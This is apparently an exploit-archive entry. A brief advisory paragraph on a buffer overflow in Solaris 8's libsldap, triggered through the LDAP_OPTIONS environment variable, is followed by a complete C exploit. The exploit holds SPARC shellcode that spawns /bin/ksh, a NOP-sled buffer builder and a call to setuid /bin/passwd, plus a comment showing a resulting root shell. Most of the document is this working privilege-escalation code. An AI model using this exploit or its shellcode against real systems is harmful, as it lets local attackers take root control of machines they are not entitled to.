// source: https://www.securityfocus.com/bid/2931/info
Solaris 8 ships with a shared library that implements LDAP functionality called 'libsldap'. This library is linked to by a number of system utilities, many of them installed setuid or setgid.
Libsldap contains a buffer overflow vulnerability in it's handling of the 'LDAP_OPTIONS' environment variable.
Local attackers can exploit this vulnerability in setuid/setgid programs linked to libsldap to elevate privileges.
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
/* $Id: ldap_exp2.c,v 1.1 2001/06/27 23:01:04 fygrave Exp $
*
* victim% ./lod -s 316 -p 5
* jumping into: ffbefe74 (buf size: 156, soff: 316, stack: ffbefd38)
* # id
* uid=0(root) gid=200(em) egid=3(sys)
* # uname -a
* SunOS victim 5.8 Generic_108528-06 sun4u sparc SUNW,Ultra-60
* # ^D
* victim%
* Thu Jun 28 05:22:38 ICT 2001
* Fyodor <fygrave@tigerteam.net>
*/
#define NOP "\x80\x1c\x40\x11"
#define BUFSIZE 156
#define LOCALBUF 10000
#define NOPS 1964
#define PAD 3
#define SOFF 664
char shellcode[]=
"\x90\x1a\x40\x09" /* xor %o1, %o1, %o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x20\xbf\xff\xff" /* bn,a 0x108b4 <main+8> */
"\x20\xbf\xff\xff" /* bn,a 0x108b8 <maino> */
"\x7f\xff\xff\xff" /* call 0x108bc <shellcode> */
"\x90\x03\xe0\x30" /* add %o7, 0x30, %o0 */
"\x92\x03\xe0\x28" /* add %o7, 0x28, %o1 */
"\xc0\x2b\xe0\x38" /* clrb [ %o7 + 0x38 ] */
"\xd0\x23\xe0\x28" /* st %o0, [ %o7 + 0x28 ] */
"\xc0\x23\xe0\x2c" /* clr [ %o7 + 0x2c ] */
"\x82\x10\x20\x0b" /* mov 0xb, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x82\x10\x20\x01" /* mov 1, %g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"\x41\x41\x41\x41" /* AAAA */
"\x41\x41\x41\x41" /* AAAA */
"\x2f\x62\x69\x6e" /* /bin */
"\x2f\x6b\x73\x68" /* /ksh */
"\x41\x57\x68\x6f"; /* junk */
extern char *optarg;
unsigned long get_sp(void) {
__asm__("mov %sp,%i0 \n");
}
int main(int argc, char **argv) {
static char buf[LOCALBUF], *ptr;
unsigned long addr, bufsize, soff, pad;
int i, c;
soff = SOFF;
bufsize = BUFSIZE;
pad = PAD;
while((c = getopt(argc, argv, "s:b:p:h")) !=EOF)
switch(c) {
case 'b':
bufsize = strtoul(optarg,NULL,0);
break;
case 's':
soff = strtoul(optarg,NULL,0);
break;
case 'p':
pad = strtoul(optarg,NULL,0);
break;
case 'h':
default:
fprintf(stderr,"usage: %s [-b buffsize] [-s stackoff] [-p pad]\n",
argv[0]);
exit(1);
}
bzero(buf, sizeof(buf));
strcpy(buf,"LDAP_OPTIONS=");
ptr=buf + strlen(buf);
for(i=0;i<bufsize;i++, ptr++) *ptr='A';
addr = get_sp() + soff;
memcpy(ptr,(char *)&addr, 4);
memcpy(ptr+4,(char *)&addr, 4);
ptr+=8;
for(i=0;i<pad;i++, ptr++) *ptr='A';
for(i=0;i<NOPS;i++, ptr+=4) memcpy(ptr, NOP, 4);
strcat(buf, shellcode);
putenv(buf);
fprintf(stderr,"jumping into: %lx (buf size: %i, soff: %i, stack: %lx)\n",
addr, bufsize, soff, get_sp());
execl("/bin/passwd","lameswd",0);
}
